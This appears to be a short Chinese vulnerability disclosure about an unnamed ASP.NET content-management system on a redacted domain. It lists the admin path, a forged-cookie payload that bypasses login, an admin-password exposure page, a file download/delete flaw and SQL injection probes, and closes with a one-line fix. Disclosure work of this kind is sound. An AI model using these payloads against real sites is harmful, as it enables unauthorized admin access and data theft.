(这次报个礼包求邀请码)
后台入口:
/manage/login.aspx
伪造cookie即可绕过登陆
[{
"domain": ".xxx.com",
"expirationDate": 1392975480,
"hostOnly": false,
"httpOnly": false,
"name": "AdminID",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "1"
},
{
"domain": ".xxx.com",
"expirationDate": 1392975480,
"hostOnly": false,
"httpOnly": false,
"name": "AdminName",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "admin"
}]
爆管理员账户密码:
/manage/admins.aspx
任意文件下载/删除:
期刊下载-添加下载文档 (删除此条目会同时删掉所指向文件)
SQL注入:
/manage/EditAdmin.aspx?ID=1'
/manage/EditAdmin.aspx?ID=1 and 1=1
修复方案:
过滤,验证